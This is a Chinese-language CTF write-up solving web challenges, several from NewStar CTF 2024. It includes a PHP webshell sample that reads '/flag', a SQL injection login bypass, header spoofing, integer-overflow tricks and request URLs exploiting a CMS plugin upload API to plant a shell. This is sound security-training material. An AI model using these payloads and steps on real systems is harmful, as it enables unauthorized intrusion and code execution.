首页 > 其他分享 >CTF Week8 WP

CTF Week8 WP

时间:2024-10-24 22:31:14浏览次数:4  
标签:http NewStar 2024 Week8 CTF WP 题库 php

作业管理系统

简单的PHP上传,传一个带shellphp文件就可以了.

示例文件
<?php
echo shell_exec("ls /");
echo shell_exec("cat /flag");
phpinfo();
?>

来源:题库

LocalCat

验证是否为本地用户,在请求头部添加X-Forwarded-for: 127.0.0.1即可.

来源:题库

电子木鱼

Rust代码审计.

首先看到需要\(1e9\)功德才可以拿到flag,然而每次只能增加\(1e3\)或减少一个值.

发\(10^6\)个包几乎是不可能的. 因此尝试利用减少一个负数来达到增加的效果.

想直接减负数是不可以的.

{"success":false,"message":"佛祖面前都敢作弊,真不怕遭报应啊"}

发现源代码的这里有问题,强制转换数据类型可能造成溢出.

因此尝试利用这里,传入一个大整数.

成功!

来源:题库

http

第一关:post 一个数据,hello=http!

第二关:使用put方法发送请求;

第三关:改cookie.

注释里有提示:

cookie改成它,然后名字输入admin就可以了.
注意原来有的cookie和需要改成的长得很像,不要混淆,仍然需要改.

得到flag.

来源:题库

简历系统

发现有sql注入,尝试万能拼接语句:

admin' or 1=1#

成功登录. 发现有一个文件上传,直接上传php文件即可获得shell.

来源:题库

交换大王卡

也是整数溢出. 先在第三个那里加\(9e17\)点让点数变为负值,然后再在第三个那里加\(\frac{-7646744073709551616}{12}=637228672809129301\)点,就发现变成\(-4\)点了,再在第三个那里加上2点就可以了.

来源:题库

headach3

直接找响应头即可获得flag.

来源:NewStar CTF 2024

会赢吗

第一部分在注释里;第二部分发现有js,可以在控制台里输出这个函数revealFlag('4cqu1siti0n')获得;第三部分把红字“已封印”改为“解封”再点击按钮;第四部分把<noscript>标签里的内容提出来,再将其属性display: none;删除,点击“无量空处!!”按钮.

最后把四部分拼接起来用base64解码即可.

来源:NewStar CTF 2024

智械危机

首先访问/robots.txt,打开/backd0or.php;然后需要一个command和一个key串,发现key其实就是把commandbase64编码串给反转后做md5然后再进行base64编码. 按照逻辑即可发送shell.

来源:NewStar CTF 2024

chocolate

先随便乱输几个数,然后进入提示界面.

第一关,需要输入一个数据num,它的值必须为\(1337\),不能出现字母和点号,而且必须出现\(0\)且不能在首位. 因此可以发送一个符号后面接一个\(0\)即可骗过这些检测,并最终读取到数字.

这里有一个ciphertext,使用工具解码即可进入下一关.

第二关,一些md5的强比较. 考查了md5碰撞、0e绕过和暴力枚举数字匹配md5.

根据步骤做即可.

第三关,PHP垃圾回收,当传入的序列有问题时,Exception会进行无效参数的回收. 而因为指定了chocolate这个类,会在回收之前执行__destruct()函数,从而执行语句并获得答案.

第四关,通过提示“太苦”还是“太甜”二分找出“糖分”的量.

最终获得flag.

来源:NewStar CTF 2024

ezcmsss

首先进入后台. 密码在/www.zip备份中.

上网查询易知极致cms1.9.5存在插件文件上传漏洞,但是为了提高难度出题人有意阻止了从远程服务器下载文件. 因此可以把含shell的php的压缩包先上传至服务器,再调用api通过http://127.0.0.1/***将文件从服务器的本地下载到服务器的本地.

示例:

http://***.cloudeci1.ichunqiu.com/admin.php/Plugins/update?filepath=123&download_url=http://127.0.0.1/cache/202410237363.zip&action=start-download

然后调用api解压到/A/exts/目录下,示例:

http://***.cloudeci1.ichunqiu.com/admin.php/Plugins/update?filepath=123&action=file-upzip

打开目录下刚刚上传的php文件:

大功告成!

来源:NewStar CTF 2024

标签:http,NewStar,2024,Week8,CTF,WP,题库,php
From: https://www.cnblogs.com/AC1Liu/p/18499406

相关文章

  • 如何在WPF程序中启用ASP.NET Core的功能
    本文介绍一种如何在WPF程序中启用ASP.NETCore功能的方法关于ASP.NETCore,如果之前不太了解,那么简介就是ASP.NETCore是一个跨平台、高性能的开源框架,用于构建支持云的现代Internet连接应用程序。简单来说,就是启用web服务器的功能,以实现WebAPI,亦或是Razor网页等功能。......
  • shctf[Week3] 小小cms
    看到首页面了解到YzmCMS的版本,上网搜搜这个版本存在的漏洞发现存在任意函数调用RCE的漏洞https://blog.csdn.net/shelter1234567/article/details/138524342根据文章直接抄payload,进入/pay/index/pay_callback目录下下面cat/flag即可,最终的payload为out_trade_no[0]=eq&o......
  • SHCTF(week 2)web-wp
    1.guess_the_number:F12后查看源码并下载,由于可以获得第一个数,要知道seed可以使得每次生成的随机数一样,我们考虑爆seed,写脚本如下:importrandomdefr1(seed):random.seed(seed)returnrandom.randint(1000000000,9999999999)forseedinrange(1000000,9999999):......
  • CTF学习(10):Misc(LSB)
    1.有提示得知本题考点为LSB(隐写方法的一种?)--->查看详细信息/010editor(无果)--->foremost无法分离2.使用stegsolve发现该图片在redgreenblueplane0时上方会出现黑白条纹3.使用dataextract功能(数据提取)将发现异常的几个通道选择后提取图片(这种题目的做题思路是从......
  • SHCTF(week 1)web-wp
    1.1zflask:题目描述问robots有什么用,那就进入/robots.txt目录找到/s3recttt,下面根据下载的文件内容进入/api目录,覆盖SSHCTFF变量?SSHCTFF=cat/flag就可以得到flag。2.MD5Master:使用fastcoll生成指定头文件的MD5碰撞,下面拖到16进制编译器去个头,并url编码发过去就行(这里不要用......
  • BUUCTF_2020网鼎杯[朱雀组]phpweb
    BUUCTF_2020网鼎杯[朱雀组]phpweb启动环境页面出现warning,并且发现页面存在自动刷新,使用burpsuite抓包:发现两个参数func和p并且发现页面中有2024-10-2403:55:59am,判断执行了date函数,根据func和p的形式猜测函数执行,func输入函数,p输入语句获取源代码:func=highlight_file&p=......
  • WinForm 简单实现仿WPF的WrapPanel和StackPanel
    publicinterfaceIDesiredPanel{SizeGetDesiredSize(intavailableWidth,intavaiableHeight);}publicclassStackPanel:Panel,IDesiredPanel{protectedoverridevoidOnLayout(LayoutEventArgslevent){base.OnLayout(levent);......
  • WPS 2021 下载及安装教程
    软件介绍WPS2021是一款功能强大的办公软件,由金山软件集团开发。它是一款跨平台软件,支持Windows、Mac和Linux操作系统。WPS2021不仅提供了功能齐全的文本编辑器,表格处理器和演示制作工具,还集成了PDF编辑器、笔记应用程序和邮件客户端功能。安装包下载WPS2021安装包免费......
  • CTFHUB技能树之文件上传——MIME绕过
    开启靶场,打开链接:直接指明是MIME验证新建04MIME.php文件,内容如下:<?phpecho"Ciallo~(∠・ω<)⌒★";@eval($_POST['pass']);?>(这里加了点表情,加带点私货)用burp抓包:将application/octet-stream改成image/png或者jpg和gif符合条件就行:之后再点击“forward”提......
  • ctfshow-pwn-前置基础
    pwn13按照题目提示的信息,用gcc命令生成可执行文件,再运行即可得到flagpwn14题目提示:阅读以下源码,给定key为”CTFshow”,编译运行即可获得flag,那么我们直接看源代码开始有一个文件是否存在的检查,如果当前目录下不存在名为"key"的文件就会报错接下去就是通过循环将fp的值(也就......